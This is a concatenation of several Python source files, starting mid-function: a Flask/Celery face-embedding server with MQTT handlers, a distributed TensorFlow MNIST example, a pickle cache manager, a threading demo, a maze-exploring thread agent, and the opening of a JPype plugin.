old_train_set.is_or_isnot = False
db.session.add(old_train_set)
db.session.commit()
# url中的face是 xxx
new_train_set = TrainSet(url=url, group_id=group_id, is_or_isnot=True, device_id=device_id,
face_id=face_id, style=style)
db.session.add(new_train_set)
db.session.commit()
if img_type == 'object' and EN_OBJECT_DETECTION is True:
infile = gbottlenecks.downloadImg(url, group_id, face_id, new_train_set.id)
resize(infile)
os.remove(infile) # 保存resized的图片,删除原图
gbottlenecks.createAndCacheBottlenecks()
OBJ_COUNT += 1
# 这里需要把老图从本地目录删除掉
old_img_path = infile.replace(str(new_train_set.id)+'.jpg', str(old_train_set.id)+'.jpg')
os.remove(old_img_path)
elif SVM_CLASSIFIER_ENABLED is True:
img_path = save_embedding.download_img_for_svm(url, group_id, face_id, style=style)
if img_path:
denoise_path = save_embedding.get_image_denoise_path(img_path)
recreate_embedding = False
if not os.path.exists(denoise_path):
img = misc.imread(os.path.expanduser(img_path))
save_embedding.save_image_denoise(img, denoise_path)
recreate_embedding = True
embedding_path = save_embedding.get_embedding_path(img_path)
if os.path.isfile(embedding_path) is False:
#img = misc.imread(os.path.expanduser(img_path)) # 手动裁剪后的图片需要再缩放一下
#aligned = misc.imresize(img, (image_size, image_size))
#misc.imsave(img_path, aligned)
if embedding is None:
embedding = featureCalculation(denoise_path)
save_embedding.create_embedding_string(embedding, embedding_path)
FACE_COUNT[style] += 1
print('update: {} style face count, url={}'.format(FACE_COUNT[style], url))
# 这里需要把老图从本地目录删除掉
old_img_path = img_path.replace(str(new_train_set.id) + '.jpg', str(old_train_set.id) + '.jpg')
os.remove(old_img_path)
else:
print('face')
img_path = save_embedding.download_img(url, group_id, face_id, img_id=new_train_set.id, style=style)
#img = misc.imread(os.path.expanduser(img_path)) # 手动裁剪后的图片需要再缩放一下
#aligned = misc.imresize(img, (image_size, image_size))
#misc.imsave(img_path, aligned)
embedding = featureCalculation(img_path)
embedding_path = save_embedding.get_embedding_path(img_path)
save_embedding.create_embedding_string(embedding, embedding_path)
FACE_COUNT[style] += 1
print('{} style face count'.format((FACE_COUNT[style])))
# 这里需要把老图从本地目录删除掉
old_img_path = img_path.replace(str(new_train_set.id) + '.jpg', str(old_train_set.id) + '.jpg')
os.remove(old_img_path)
else:
print("already in dataset")
if USE_DEFAULT_DATA is True:
check_default_data(group_id, style)
if img_type == 'object':
# all_dataset = TrainSet.query.filter_by(group_id=group_id, face_id=face_id, is_or_isnot=True).all()
# cnt = TrainSet.query.filter_by(group_id=group_id, face_id=face_id, is_or_isnot=True).count()
if OBJ_COUNT > 0 and OBJ_COUNT % 20 == 0:
#sendMessage2Group(device_id, group_id, "Training now ...")
clean_droped_embedding(group_id)
print("training now ...")
if os.path.exists('objects/train_obj.exe'):
os.system("./objects/train_obj.exe {} {}".format(deviceId, group_id))
elif os.path.exists('objects/train_obj.pyc'):
os.system("python objects/train_obj.pyc {} {}".format(deviceId, group_id))
else:
os.system("python objects/train_obj.py {} {}".format(deviceId, group_id))
else:
current_groupid = get_current_groupid()
if SVM_CLASSIFIER_ENABLED is True and FACE_COUNT[style] > 0 and FACE_COUNT[style] % 10 == 0:
# #http://sharats.me/the-ever-useful-and-neat-subprocess-module.html
# #https://stackoverflow.com/questions/2837214/python-popen-command-wait-until-the-command-is-finished
if mqttc is not None:
mqttc.train_svm(device_id, current_groupid, "Auto training triggered ...")
'''
clean_droped_embedding(current_groupid)
svm_current_groupid_basepath = os.path.join('data', 'faces', current_groupid)
if len(device_id) > 1 and len(current_groupid) > 1:
sendMessage2Group(device_id, current_groupid, "Auto training triggered ...")
stime = time.time()
# for style in ['left_side', 'right_side', 'front']:
for style in ['front']:
#style = 'front'
svm_train_dataset = os.path.join(svm_current_groupid_basepath, style, 'face_embedding')
if not os.path.exists(svm_train_dataset):
continue
svn_train_pkl = os.path.join(svm_current_groupid_basepath, style, 'classifier_182.pkl')
args_list = ['TRAIN', svm_train_dataset, 'facenet_models/20170512-110547/20170512-110547.pb',
svn_train_pkl, '--batch_size', '1000']
generate_embedding_ifmissing(svm_train_dataset)
ret_val = classifer.train_svm_with_embedding(args_list)
message = "Failed"
if ret_val is None:
message = "Failed"
else:
if ret_val is "OK":
train_cost = round(time.time() - stime,2)
message = '-> Train cost {}s'.format(train_cost)
else:
message = ret_val
print('-> Train {} SVM cost {}s'.format(style, time.time() - stime))
if len(device_id) > 1 and len(current_groupid) > 1:
sendMessage2Group(device_id, current_groupid, message)
'''
elif EN_SOFTMAX is True and FACE_COUNT[style] > 0 and FACE_COUNT[style] % 20 == 0:
clean_droped_embedding(group_id)
print("training on embedding now ...")
if os.path.exists('faces/train_faces.exe'):
output = subprocess.check_output(['./faces/train_faces.exe', current_groupid, style])
# s = subprocess.Popen('python ./faces/train_faces.exe {} {}'.format(current_groupid, style), shell=True)
elif os.path.exists('faces/train_faces.pyc'):
output = subprocess.check_output(['python', 'faces/train_faces.pyc', current_groupid, style])
# s = subprocess.Popen('python ./faces/train_faces.pyc {} {}'.format(current_groupid, style), shell=True)
else:
output = subprocess.check_output(['python', 'faces/train_faces.py', current_groupid, style])
# s = subprocess.Popen('python ./faces/train_faces.py {} {}'.format(current_groupid, style), shell=True)
print(output)
# os.system("python faces/train_faces.py") # 两种外挂训练方式
## 用户手动label时,更新自动标注训练集
# labeled_img = {}
def updata_trainset(json):
    """Handle a manual-label event for the training set (LEGACY, disabled).

    NOTE(review): the function prints a notice and returns immediately, so
    everything below the first ``return`` is unreachable legacy code kept
    only for reference.

    json -- dict-like payload with keys url, person_id, device_id,
            face_id and drop.
    """
    print("legacy trainset ignored")
    return
    # --- unreachable legacy implementation below ---
    # Incoming JSON-format data
    data = json
    url = data.get('url')
    person_id = data.get('person_id')
    device_id = data.get('device_id')
    face_id = data.get('face_id')
    drop = data.get('drop')
    # All fields are mandatory; bail out silently if any is missing.
    if (url is None) or (person_id is None) or (device_id is None) or (face_id is None) or (drop is None):
        return
    with app.app_context():
        if drop == 'true' or drop == 'True' or drop == True:
            # Drop request: remove every record for this url on this device.
            train_set = TrainSet.query.filter_by(url=url, device_id=device_id).all()
            for t in train_set:
                db.session.delete(t)
                db.session.commit()
            # labeled_img[person_id].remove(url)
        else:
            old_train_set = TrainSet.query.filter_by(url=url, device_id=device_id, is_or_isnot=True).first() # each image maps to exactly one person
            if old_train_set and old_train_set.face_id != int(face_id):
                # The face in this url is NOT this person any more.
                old_train_set.is_or_isnot = False
                db.session.add(old_train_set)
                db.session.commit()
                # The face in this url IS this person.
                new_train_set = TrainSet(url=url,
                                         embed=old_train_set.embed,
                                         is_or_isnot=True,
                                         person_id=person_id,
                                         device_id=device_id,
                                         face_id=face_id,
                                         )
                db.session.add(new_train_set)
                db.session.commit()
                print(old_train_set)
                print(new_train_set)
    # Keep a separate dict file recording manually labeled urls
    # if not labeled_img.has_key(person_id):
    #     labeled_img[person_id] = set([])
    # labeled_img[person_id].add(url)
@app.route('/api/tablet/', methods=['POST'])
def sync_config():
    """Tablet sync endpoint: on a 'group' event, rejoin MQTT for the device.

    Always answers {"result": "ok"}; the command and its parameters are
    carried in the query string (type, uuid, group_id).
    """
    cmd_type = request.args.get('type', '')
    print(cmd_type)
    # NOTE(review): .get(..., '') never returns None, so the None checks
    # below are redundant — kept as-is.
    if cmd_type is not None and len(cmd_type) > 1:
        if cmd_type == 'group':
            uuid = request.args.get('uuid', '')
            group_id = request.args.get('group_id', '')
            print(uuid)
            print(group_id)
            if uuid is not None and len(uuid) > 1:
                print("uuid=%s got group event, going to reconnect mqtt" %(uuid))
                # Clear the stored group_id, otherwise a fresh one will not
                # be re-fetched from the server.
                save_groupid_to_file('')
                mqttc.reSubscribeGroup(uuid)
                time.sleep(2)
    return Response(json.dumps({"result":"ok"}), status=200, mimetype='application/json')
@app.errorhandler(404)
def not_found(error=None):
    """Return a JSON-formatted 404 response for unknown routes."""
    payload = json.dumps({
        'status': 404,
        'message': 'Not Found ' + request.url,
    })
    return make_response(payload, 404)
# Manual upload test page
@app.route('/test/upload')
def upload_test():
    """Serve a minimal HTML form that posts a file to /api/images."""
    return '''
    <!doctype html>
    <title>Upload new File</title>
    <h1>Upload new File</h1>
    <form method=post action=/api/images enctype=multipart/form-data>
    <p><input type=file name=file>
         <input type=submit value=Upload>
    </form>
    '''
def parse_arguments(argv):
    """Parse command-line options for the upload server.

    argv -- list of argument strings (typically sys.argv[1:]).
    Returns an argparse.Namespace with report, port and host attributes.
    """
    ap = argparse.ArgumentParser()
    # --report / --no-report toggle the same boolean; default is on.
    ap.add_argument('--report', dest='report', action='store_true')
    ap.add_argument('--no-report', dest='report', action='store_false')
    ap.set_defaults(report=True)
    ap.add_argument('--port', type=int, default=5000,
                    help='The port server listen on')
    ap.add_argument('--host', type=str, default='0.0.0.0',
                    help='The ip server listen on')
    return ap.parse_args(argv)
def mqttDebugOnOff(MQTTDebugFlag):
    """Enable or disable forwarding of debug logs to the MQTT group.

    MQTTDebugFlag -- must be a real bool; any other value (e.g. a string
    arriving from a message payload) is ignored, matching the original
    ``is True or is False`` identity checks.
    """
    global ENABLE_DEBUG_LOG_TO_GROUP
    # isinstance(x, bool) accepts exactly True/False, the same set the
    # original pair of identity comparisons accepted.
    if isinstance(MQTTDebugFlag, bool):
        ENABLE_DEBUG_LOG_TO_GROUP = MQTTDebugFlag
def crons_start():
    """One-time startup hook: ensure the upload dir and SQLite schema exist."""
    if not os.path.exists(UPLOAD_FOLDER):
        os.makedirs(UPLOAD_FOLDER)
    # Create all tables only on first run (data/data.sqlite missing).
    if not os.path.exists(os.path.join(BASEDIR, 'data', 'data.sqlite')):
        db.create_all()
# Filesystem locations used by the SVM classifier pipeline;
# populated by init_fs() when SVM_CLASSIFIER_ENABLED is set.
svm_face_dataset=None
svm_face_embedding=None
svm_tmp_dir=None
svm_face_testdataset=None
svm_stranger_testdataset=None
def init_fs():
    """Create the on-disk directory/database layout the server expects.

    Idempotent: directories are created with ``exist_ok=True``, which also
    removes the check-then-create race of the original implementation and
    unifies the previous mix of os.mkdir/os.makedirs.
    """
    global svm_face_dataset
    global svm_face_embedding
    global svm_tmp_dir
    global svm_face_testdataset
    global svm_stranger_testdataset
    os.makedirs(UPLOAD_FOLDER, exist_ok=True)
    # if not os.path.exists(os.path.join(BASEDIR, 'data.sqlite')):
    #     db.create_all()
    if not os.path.exists(os.path.join(BASEDIR, 'data', 'data.sqlite')):
        if os.path.exists(os.path.join(BASEDIR, 'data_init')):
            # Seed the SQLite database from the bundled template on first run.
            shutil.copyfile(os.path.join(BASEDIR, 'data_init'), os.path.join(BASEDIR, 'data', 'data.sqlite'))
    os.makedirs(TMP_DIR_PATH, exist_ok=True)
    if SVM_CLASSIFIER_ENABLED:
        svm_face_dataset = os.path.join(BASEDIR, 'data', 'face_dataset')
        svm_face_embedding = os.path.join(BASEDIR, 'data', 'face_embedding')
        svm_tmp_dir = os.path.join(BASEDIR, 'data', 'faces', 'noname', 'person')
        svm_face_testdataset = os.path.join(BASEDIR, 'data', 'face_testdataset')
        svm_stranger_testdataset = os.path.join(BASEDIR, 'data', 'stranger_testdataset')
        for directory in (svm_face_dataset, svm_face_embedding, svm_tmp_dir,
                          svm_face_testdataset, svm_stranger_testdataset):
            os.makedirs(directory, exist_ok=True)
def init_mqtt_client():
    """Create, wire up and start the MQTT client for this device.

    The client id is the device id concatenated with the listen port; all
    message-type handlers are registered before the network loop starts.
    """
    #TODO: UUID when no eth0/wlan0
    device_id = get_deviceid()
    # NOTE(review): this assigns a LOCAL `mqttc`, shadowing the module-level
    # client that other functions (e.g. sync_config) use — confirm whether a
    # `global mqttc` declaration is missing here.
    mqttc = MyMQTTClass(device_id + str(5000))
    mqttc.initialize(updata_trainset, disposeAutoGroupFunc)
    mqttc.registerUpateTrainsetHandle(updateDataSet)
    mqttc.registerMQTTDebugOnOffHandle(mqttDebugOnOff)
    mqttc.registerDropPersonHandle(dropPersonFunc)
    mqttc.registerMQTTFinalSyncDatasetsHandle(disposeFinalSyncDatasetsThreadFunc)
    mqttc.registerMQTTSyncStatusInfoHandle(disposeSyncStatusInfoThreadFunc)
    mqttc.registerMQTTGenerateEmbeddingIfMissingHandle(generate_embedding_ifmissing)
    mqttc.start()
def update_frame_db(camera_id=None, device_id=None, group_id=None, blury=None, img_path=None, img_style=None, accuracy=None, url=None, num_face=None, tracking_id=None, time_stamp=None, tracking_flag=None):
    """Insert or update a Frame row keyed by (group_id, img_path).

    A missing row is inserted with all supplied values; an existing row is
    patched field-by-field, skipping any argument left as None.
    """
    if img_path is None or group_id is None:
        return
    with app.app_context():
        frame = Frame.query.filter_by(group_id=group_id, img_path=img_path).first()
        if frame is None:
            new_frame = Frame(camera_id=camera_id, group_id=group_id, blury=blury, img_path=img_path,
                              img_style=img_style, accuracy=accuracy, url=url, num_face=num_face,
                              tracking_id=tracking_id, device_id=device_id, time_stamp=time_stamp, tracking_flag=tracking_flag)
            db.session.add(new_frame)
            print("insert in db: {}".format(new_frame))
        else:
            # Patch only the columns whose argument was actually provided.
            updates = (
                ('blury', blury),
                ('img_style', img_style),
                ('accuracy', accuracy),
                ('url', url),
                ('num_face', num_face),
                ('tracking_id', tracking_id),
                ('time_stamp', time_stamp),
                ('tracking_flag', tracking_flag),
            )
            for attr, value in updates:
                if value is not None:
                    setattr(frame, attr, value)
            db.session.add(frame)
            print("update db: {}".format(frame))
        db.session.commit()
def getQueueName():
    """Return the worker queue name from the WORKER_TYPE env var ('' if unset).

    os.environ is always a mapping, so .get() replaces the original's
    redundant None check and ``in os.environ.keys()`` membership test.
    """
    return os.environ.get('WORKER_TYPE', "")
def featureCalculation2(imgpath):
    """Compute the face embedding for an image file on disk.

    When HAS_OPENCL == 'false' the file is base64-encoded and sent to the
    remote embedding service; otherwise the local FaceProcessing pipeline
    is used.  Returns the embedding (or None if the backend produced none).
    """
    embedding=None
    if HAS_OPENCL == 'false':
        with open(imgpath, "rb") as image_file:
            encoded_string = base64.b64encode(image_file.read())
            embedding = get_remote_embedding(encoded_string)
    else:
        embedding = FaceProcessing.FaceProcessingImageData2(imgpath)
    return embedding
@worker_process_init.connect()
def setup(sender=None, **kwargs):
    """Celery per-fork initializer for this worker process.

    Only workers serving the 'embedding' queue do the heavy setup
    (group check, filesystem layout, OpenCL warm-up, MQTT client).
    """
    global mqttc
    # setup
    print('done initializing <<< ==== be called Per Fork/Process')
    _type=getQueueName()
    if _type == "embedding":
        check_groupid_changed()
        init_fs()
        if HAS_OPENCL == 'true':
            # Load the model and push one dummy image through it so the
            # first real request does not pay the warm-up cost.
            mod = FaceProcessing.init_embedding_processor()
            print("start to warm up")
            embedding = featureCalculation2(os.path.join(BASEDIR,"image","Mike_Alden_0001_tmp.png"))
            print("warmed up")
        #if embedding is not None:
        #    print("worker embedding ready")
        init_mqtt_client()
    # NOTE(review): the return value of a worker_process_init handler is
    # ignored by Celery; "detect" looks vestigial — confirm.
    return "detect"
class FaceDetectorTask(Task):
    """Celery Task base that records which queue this worker serves."""
    def __init__(self):
        self._model = 'testing'      # placeholder model tag
        self._type = getQueueName()  # queue name from the WORKER_TYPE env var
        print(">>> {}".format(self._type))
@deepeye.task
def extract_v2(image):
    """Celery task: compute a face embedding for one base64-encoded image.

    image -- dict with keys base64data, path, style, blury, ts, trackerid,
             totalPeople (only base64data is actually used below; the rest
             are unpacked but unused — apparently kept for API parity).
    Returns a JSON string carrying either embedding_str or an error.
    """
    # print(">>> extract() {} ".format(image))
    imgstring=image["base64data"]
    imgpath=image["path"]
    style=image["style"]
    blury=image["blury"]
    ts=image["ts"]
    trackerid=image["trackerid"]
    totalPeople=image["totalPeople"]
    uuid = get_deviceid()
    current_groupid = get_current_groupid()
    # A device must have joined a group before embeddings make sense.
    if current_groupid is None:
        return json.dumps({"embedding_path":"","error":"please join group"})
    if HAS_OPENCL == 'false':
        embedding = get_remote_embedding(imgstring)
    else:
        embedding = FaceProcessing.FaceProcessingBase64ImageData2(imgstring)
    embedding_path=''
    embedding_str=''
    if embedding is not None:
        if type(trackerid) is not str:
            trackerid = str(trackerid)
        embedding_str = save_embedding.convert_embedding_to_string(embedding)
        return json.dumps({"embedding_str":embedding_str})
    else:
        return json.dumps({"error":"please check your configuration"})
# Route the embedding extraction task to the dedicated 'embedding' queue.
deepeye.conf.task_routes = {
    'upload_api-v2.extract_v2': {'queue': 'embedding'}
}
if __name__ == '__main__':
    deepeye.start()
|
mnist.py | import argparse
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets
from tfmesos import cluster
from threading import Thread, RLock
# Command-line options: cluster sizes, GPUs per worker, mesos settings.
parser = argparse.ArgumentParser()
parser.add_argument('-w', '--nworker', type=int, default=1)
parser.add_argument('-s', '--nserver', type=int, default=1)
parser.add_argument('-Gw', '--worker-gpus', type=int, default=0)
parser.add_argument('-C', '--containerizer_type', choices=["MESOS", "DOCKER"], type=lambda s: s.upper(), nargs='?')
parser.add_argument('-P', '--protocol', type=str)
args, cmd = parser.parse_known_args()
# First positional argument (if any) is the mesos master address.
master = cmd[0] if cmd else None
nworker = args.nworker
nserver = args.nserver
extra_kw = {}
if args.containerizer_type:
    extra_kw['containerizer_type'] = args.containerizer_type
if args.protocol:
    extra_kw['protocol'] = args.protocol
# One 'ps' job for parameter servers, one 'worker' job for trainers.
jobs_def = [
    {
        "name": "ps",
        "num": nserver
    },
    {
        "name": "worker",
        "num": nworker,
        "gpus": args.worker_gpus,
    },
]
# Serializes access to mnist.train.next_batch across worker threads.
_lock = RLock()
mnist = read_data_sets("MNIST_data/", one_hot=True)
with cluster(jobs_def, master=master, quiet=False, **extra_kw) as c:
    graph = tf.Graph()
    with graph.as_default():
        # Variables are placed on the parameter servers by the device setter.
        with tf.device(tf.train.replica_device_setter(ps_tasks=nserver)):
            W = tf.Variable(tf.zeros([784, 10]))
            b = tf.Variable(tf.zeros([10]))
            global_step = tf.Variable(0)
            x = tf.placeholder(tf.float32, [None, 784])
            y = tf.nn.softmax(tf.matmul(x, W) + b)
            y_ = tf.placeholder(tf.float32, [None, 10])
            cross_entropy = -tf.reduce_sum(y_*tf.log(y))
            steps = []
            # One optimizer step op pinned to each worker task.
            for i in range(nworker):
                with tf.device('/job:worker/task:%d' % i):
                    steps.append(tf.train.GradientDescentOptimizer(0.005).minimize(cross_entropy, global_step=global_step))
            correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
            accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
            init_op = tf.global_variables_initializer()
        coord = tf.train.Coordinator()
        def train(i):
            # Worker thread body: run this worker's optimizer step until the
            # shared global_step reaches 10000 or another thread stops us.
            with graph.as_default():
                with tf.Session(c.targets['/job:worker/task:%d' % i]) as sess:
                    step = 0
                    while not coord.should_stop() and step < 10000:
                        with _lock:
                            batch_xs, batch_ys = mnist.train.next_batch(100)
                        _, step = sess.run([steps[i], global_step], feed_dict={x: batch_xs, y_: batch_ys})
                    coord.request_stop()
        with tf.Session(c.targets['/job:worker/task:0']) as sess:
            sess.run(init_op)
            threads = [Thread(target=train, args=(i,)) for i in range(nworker)]
            for t in threads:
                t.start()
            coord.join(threads)
            print(sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels}))
|
databases_cache_mgr.py | from pickle_helper import reading_pkl
from sets import Set
import numpy as np
import threading
import time
import os
from relational_network_utilities import print_debug
from relational_network_utilities import time_string
class DatabasesCacheMgr(object):
    """Singleton cache of pickled (inputs, targets) databases.

    Databases are loaded once per path (a "base" key) and then reshaped into
    batched "views" (batch/objects/window combinations); both levels are
    memoized.  Loading can happen synchronously or on a background thread.

    NOTE(review): the internal maps are mutated from worker threads without
    a lock; concurrent use relies on CPython's GIL and the coarse polling
    sleep — confirm before adding more threads.
    """
    instance = None  # lazily created singleton (see get_instance)
    @classmethod
    def get_instance(cls):
        """Return the process-wide singleton, creating it on first use."""
        if cls.instance is None:
            cls.instance = cls()
        return cls.instance
    def __init__(self):
        self.reset()
    def internal_add_path_key(self, path, key):
        """Record that cache entry `key` was produced from `path`."""
        if path in self.path_keys_map:
            self.path_keys_map[path].append(key)
        else:
            self.path_keys_map[path] = [key]
    def remove_path_key(self, path):
        """Evict every cached entry (base and views) loaded from `path`."""
        path = path.rstrip('/')
        if not path in self.path_keys_map:
            return
        print_debug('DatabasesCacheMgr: Clearing cache for path {}'.format(path))
        for key in self.path_keys_map[path]:
            if key in self.data_inputs_map:
                del self.data_inputs_map[key]
                del self.data_targets_map[key]
        del self.path_keys_map[path]
    def reset(self):
        """Drop all cached data and bookkeeping state."""
        self.data_inputs_map = {}
        self.data_targets_map = {}
        # Base keys currently being loaded by a background thread.
        # (builtin set replaces the Python-2-only, long-removed sets.Set)
        self.async_databases = set()
        self.path_keys_map = {}
    def get_key(self, path, batch_size=1, objects_cnt=1, window=1, is_ignore_zero_inputs=False):
        """Build the memoization key for a (path, view-parameters) combination."""
        return 'Database path: {} - batch: {} - objs: {} - window: {} - zeros {}'.format(path, batch_size, objects_cnt, window, is_ignore_zero_inputs)
    def get_data(self, path, batch_size=1, objects_cnt=1, window=1, is_ignore_zero_inputs=False):
        """Return (inputs_view, targets_view) for `path`, loading and caching as needed.

        Blocks (polling every 3 minutes) while another thread is still
        loading the same base database asynchronously.
        """
        path = path.rstrip('/')
        key_view = self.get_key(path, batch_size, objects_cnt, window, is_ignore_zero_inputs)
        key_base = self.get_key(path, 1, 1)
        if key_view in self.data_inputs_map:
            return self.data_inputs_map[key_view], self.data_targets_map[key_view]
        if key_base in self.async_databases:
            print_debug('\n\n\nDatabasesCacheMgr Warning: Another thread wanna access while loading async, Lets sleep at path\n\n\n' + path)
        # Wait until any asynchronous load of this base database finishes.
        # (The original had two identical back-to-back wait loops; a single
        # loop is sufficient — the second could never iterate.)
        while key_base in self.async_databases:
            time.sleep(3 * 60)
        data_inputs = None
        data_targets = None
        if key_base in self.data_inputs_map:
            data_inputs = self.data_inputs_map[key_base]
            data_targets = self.data_targets_map[key_base]
        else:
            data_inputs, data_targets = self.internal_load_db_sync(path, key_base)
        data_inputs_view, data_targets_view = self.get_data_view(data_inputs, data_targets, batch_size, objects_cnt, window, is_ignore_zero_inputs)
        self.data_inputs_map[key_view] = data_inputs_view
        self.data_targets_map[key_view] = data_targets_view
        self.internal_add_path_key(path, key_base)
        self.internal_add_path_key(path, key_view)
        return data_inputs_view, data_targets_view
    def load_data_async(self, path, batch_size=1, objects_cnt=1, window=1, is_ignore_zero_inputs=False):
        """Kick off a daemon thread loading the base database for `path`.

        Returns the view key the caller can later pass to get_data (or None
        when the base database is already cached); only the base load is
        asynchronous — the view is built lazily by get_data.
        """
        path = path.rstrip('/')
        key_view = self.get_key(path, batch_size, objects_cnt, window, is_ignore_zero_inputs)
        key_base = self.get_key(path, 1, 1)
        if key_base in self.data_inputs_map:
            return
        self.async_databases.add(key_base)
        t = threading.Thread(target=self.internal_load_db_sync, args = (path, key_base))
        t.daemon = True
        t.start()
        return key_view
    def get_data_view(self, data_inputs, data_targets, batch_size, objects_cnt, window, is_ignore_zero_inputs):
        """Reshape flat per-step data into batches of grouped, windowed inputs.

        Layout: for every group, objects_cnt "persons" each contribute
        `window` consecutive vectors (concatenated on axis 0); persons are
        concatenated on axis 2 and groups stacked on axis 0 per batch.

        NOTE(review): only the LAST target read within a group is replicated
        `window` times into the batch targets — confirm this is intended.
        is_ignore_zero_inputs is accepted but unused here.
        """
        if len(data_inputs) == 0:
            raise NameError('DatabasesCacheMgr: Empty data!')
        if len(data_inputs) % objects_cnt != 0:
            raise NameError('DatabasesCacheMgr: can not reshape width {} to {}'.format(len(data_inputs), objects_cnt))
        data_inputs_view = []
        data_targets_view = []
        pos = 0
        while pos < len(data_inputs):
            batch_inputs = np.array([])
            batch_targets = np.array([])
            for batch_idx in range(batch_size):
                if pos >= len(data_inputs):
                    break
                group_inputs = np.array([])
                # read persons * window (each person t steps consective) and rearrange
                # build a group of consecutive vectors, e.g. 12 feature vector of players as scene representation
                for obj_idx in range(objects_cnt):
                    person_inputs = np.array([])
                    for w in range(window):
                        if pos >= len(data_inputs):
                            raise NameError('DatabasesCacheMgr: Incomplete data, cur lenth={}'.format(len(data_inputs)))
                        vec = data_inputs[pos]  # renamed from `input` (shadowed builtin)
                        target = data_targets[pos][0]
                        pos = pos + 1
                        if person_inputs.size == 0:
                            person_inputs = vec
                        else:
                            person_inputs = np.concatenate((person_inputs, vec), axis=0)
                    if group_inputs.size == 0:
                        group_inputs = person_inputs
                    else:
                        group_inputs = np.concatenate((group_inputs, person_inputs), axis=2)
                if group_inputs.size > 0:
                    if batch_inputs.size == 0:
                        batch_inputs = group_inputs
                    else:
                        batch_inputs = np.concatenate((batch_inputs, group_inputs), axis=0)
                    for w in range(window):
                        batch_targets = np.concatenate((batch_targets, np.array([target])))
            data_inputs_view.append(batch_inputs)
            data_targets_view.append(batch_targets)
        return data_inputs_view, data_targets_view
    def internal_load_db_sync(self, path, key_base):
        """Load the pickled database at `path` and memoize it under `key_base`."""
        start_time = time.time()
        print_debug('Reading from pickle file {}'.format(path))
        if not os.path.exists(path):
            raise NameError('DatabasesCacheMgr: Pickle file does NOT exit at path {}'.format(path))
        data_inputs, data_targets = reading_pkl(path)
        self.data_inputs_map[key_base] = data_inputs
        self.data_targets_map[key_base] = data_targets
        self.internal_add_path_key(path, key_base)
        # Signal any waiters in get_data that the async load has finished.
        if key_base in self.async_databases:
            self.async_databases.remove(key_base)
        print_debug("Total reading time took {} for {}".format(time_string(time.time() - start_time), path))
        return data_inputs, data_targets
|
part3.py | import threading
import time
total = 4
def creates_item():
    """Producer: ten 2-second ticks, each incrementing the shared total."""
    global total
    for step in range(10):
        time.sleep(2)
        print(f'iteration {step}')
        total += 1
    print('iterations done')
def create_items_2():
    """Faster producer: seven 1-second ticks, each incrementing the shared total."""
    global total
    for step in range(7):
        time.sleep(1)
        print(f'iteration {step}')
        total += 1
    print('iterations done')
def limits_items():
    """Consumer: forever drain the shared total by 3 whenever it exceeds 5."""
    global total
    while True:
        if total <= 5:
            # Nothing to drain yet; poll once per second.
            time.sleep(1)
            print('waiting')
        else:
            print('Overloaded')
            total -= 3
            print('subtracted by 3')
# Two producers race against one daemon consumer; only the producers are
# joined, so the program exits while the limiter may still be running
# (daemon=True lets the interpreter terminate it).
creates1 = threading.Thread(target=creates_item)
creates2 = threading.Thread(target=create_items_2)
limiter = threading.Thread(target=limits_items, daemon=True)
creates1.start()
creates2.start()
limiter.start()
creates1.join()
creates2.join()
# limiter.join()
print(f'Finish. Total iterations = {total}')
|
Agent.py | import sys
import os
import Labyrinth
import time
import threading
class Agent:
    """Maze explorer; every agent runs its explore() in its own thread.

    Each agent visits its cell, then either continues along a corridor
    (re-exploring itself in a fresh thread) or spawns one child Agent per
    branch at a fork.  Assumes `labyrinth` offers finished / isVisited /
    isFinish / visit / isWalkable — TODO confirm against Labyrinth.py.
    """
    # Class-level defaults; all are overwritten per instance in __init__.
    num = 0
    x = 0
    y = 0
    labyrinth = None
    callback = None
    def __init__(self, x, y, labyrinth, callback):
        # Millisecond timestamp doubles as a (mostly) unique agent id.
        self.num = time.time()*1000
        self.x = x
        self.y = y
        self.labyrinth = labyrinth
        self.callback = callback
        print(str(self.num)+': Created new agent. Exploring...')
        t = threading.Thread(target=self.explore)
        t.start()
    def explore(self):
        """Visit the current cell and advance/branch until a dead end or the exit.

        Note: sys.exit() raises SystemExit, which here only terminates the
        calling thread, not the whole program.
        """
        self.callback()
        # Stop if someone already found the exit or this cell was taken.
        if self.labyrinth.finished or self.labyrinth.isVisited(self.x, self.y):
            sys.exit()
        walkableSpots = []
        if (self.labyrinth.isFinish(self.x, self.y)):
            print(str(self.num)+': Agent found the exit at x: '+str(self.x)+', y: '+str(self.y))
            self.labyrinth.finished = True
            sys.exit()
        self.labyrinth.visit(self.x, self.y)
        print('{}: Visiting {} {}'.format(str(self.num), self.x, self.y))
        # Collect the walkable cells of the 4-neighbourhood.
        if (self.labyrinth.isWalkable(self.x-1, self.y)):
            walkableSpots.append({'x': self.x-1, 'y': self.y})
        if (self.labyrinth.isWalkable(self.x, self.y-1)):
            walkableSpots.append({'x': self.x, 'y': self.y-1})
        if (self.labyrinth.isWalkable(self.x+1, self.y)):
            walkableSpots.append({'x': self.x+1, 'y': self.y})
        if (self.labyrinth.isWalkable(self.x, self.y+1)):
            walkableSpots.append({'x': self.x, 'y': self.y+1})
        if (len(walkableSpots)==1):
            # Corridor: move there and keep exploring in a fresh thread.
            self.x = walkableSpots[0]['x']
            self.y = walkableSpots[0]['y']
            t = threading.Thread(target=self.explore)
            t.start()
        if (len(walkableSpots)>1):
            # Fork: spawn a child agent per branch.
            # NOTE(review): children cover every branch AND this agent then
            # also moves to branch 0, so the first branch is started twice;
            # the isVisited check makes the duplicate exit early — confirm
            # this is intended.
            for num, spot in enumerate(walkableSpots, start = 1):
                agent = Agent(spot['x'], spot['y'], self.labyrinth, self.callback)
            self.x = walkableSpots[0]['x']
            self.y = walkableSpots[0]['y']
            t = threading.Thread(target=self.explore)
            t.start()
        if (len(walkableSpots) == 0):
            print(str(self.num)+': Dead end reached, dying...')
            sys.exit()
|
javaapiplugin.py | import dlvhex
from dlvhex import ID
import hexlite
import atexit
import logging
import os
import re
import sys
import threading
import time
# this requires jpype to be installed and it requires a working Java runtime environment
import jpype
from jpype import java
from jpype.types import *
# Start the JVM once at import time; extra JVM flags can be supplied via
# the HEXLITE_JAVA_ARGUMENTS environment variable (space-separated).
logging.info("starting JVM")
java_args = os.environ.get('HEXLITE_JAVA_ARGUMENTS', [])
if java_args != []:
    # NOTE(review): an env var value is always a string, so the [] default
    # only means "unset"; an empty-string value would yield [''] here and be
    # passed to the JVM — confirm intended.
    java_args = java_args.split(' ')
